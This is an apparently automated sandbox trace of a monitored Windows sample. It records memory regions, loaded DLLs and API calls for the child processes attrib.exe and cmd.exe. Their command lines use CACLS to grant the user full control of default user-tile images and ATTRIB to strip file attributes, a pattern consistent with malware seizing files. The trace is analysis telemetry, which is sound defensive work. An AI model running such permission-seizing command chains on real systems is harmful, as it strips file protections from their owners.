"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26751 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26752 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26753 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26754 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26755 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26756 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26757 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 26758 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 26759 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26760 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26761 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = 
"kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26762 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26763 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26764 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26765 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 547 os_tid = 0x7f8 Thread: id = 548 os_tid = 0xfc0 Process: id = "384" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0x7ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "382" os_parent_pid = "0xf74" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26766 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 26767 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26768 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26769 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26770 start_va = 0x6f0000 end_va = 0x6f6fff entry_point = 0x6f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26771 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26772 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26773 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26774 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26775 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26776 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26777 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26778 start_va = 0x50000 
end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26779 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26780 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 26781 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26782 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26783 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26784 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26785 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26786 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26787 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26788 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26789 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26790 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26791 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26792 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26793 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 26794 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26795 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 549 os_tid = 0xe24 Process: id = "385" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 
"child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26796 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26797 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26798 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26799 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 26800 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26801 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26802 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26803 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26804 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 26805 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26806 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26807 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26808 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26809 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26810 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 26811 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26812 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26813 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26814 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26815 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26816 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26817 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26818 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26819 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26820 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26821 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26822 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26823 
start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 26824 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 26825 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26826 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 26827 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 26828 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 26829 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 26830 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 550 os_tid = 0xef4 [0186.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7b4 | out: lpSystemTimeAsFileTime=0x2ef7b4*(dwLowDateTime=0xa41325e0, dwHighDateTime=0x1d440a9)) [0186.513] GetCurrentProcessId () returned 0x128 [0186.513] GetCurrentThreadId () returned 0xef4 [0186.513] GetTickCount () returned 0x35485 [0186.513] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7ac | out: lpPerformanceCount=0x2ef7ac*=24330234135) returned 1 [0186.514] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.514] __set_app_type (_Type=0x1) [0186.514] __p__fmode () returned 0x76b331f4 [0186.514] __p__commode () returned 0x76b331fc [0186.514] 
SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.514] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.514] GetCurrentThreadId () returned 0xef4 [0186.514] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef4) returned 0x38 [0186.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.514] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.514] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.514] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef744 | out: phkResult=0x2ef744*=0x0) returned 0x2 [0186.515] VirtualQuery (in: lpAddress=0x2ef77b, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0186.515] GetConsoleOutputCP () returned 0x1b5 [0186.515] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.515] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.515] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.515] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.515] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.516] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.516] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.516] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.516] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.516] GetEnvironmentStringsW () returned 0x4e0308* [0186.516] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.516] GetEnvironmentStringsW () returned 0x4e0308* [0186.516] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6b4 | out: phkResult=0x2ee6b4*=0x40) returned 0x0 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0xb8, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6bc, 
lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.516] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x0, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegCloseKey (hKey=0x40) returned 0x0 [0186.517] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6b4 | out: phkResult=0x2ee6b4*=0x40) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x40, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, 
lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x1, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x0, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x9, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x4, lpData=0x2ee6c0*=0x9, lpcbData=0x2ee6b8*=0x4) returned 0x0 [0186.517] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6bc, lpData=0x2ee6c0, lpcbData=0x2ee6b8*=0x1000 | out: lpType=0x2ee6bc*=0x0, lpData=0x2ee6c0*=0x9, lpcbData=0x2ee6b8*=0x1000) returned 0x2 [0186.517] RegCloseKey (hKey=0x40) returned 0x0 [0186.517] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0186.517] srand (_Seed=0x5b886394) [0186.517] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" [0186.517] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile29.bmp\"" [0186.517] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.518] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.518] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.518] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.518] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.518] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.518] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.518] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.518] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.518] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.518] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.518] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.518] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.518] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.518] GetEnvironmentStringsW () returned 0x4e2458* [0186.518] FreeEnvironmentStringsW (penv=0x4e2458) returned 1 [0186.518] GetEnvironmentVariableW (in: 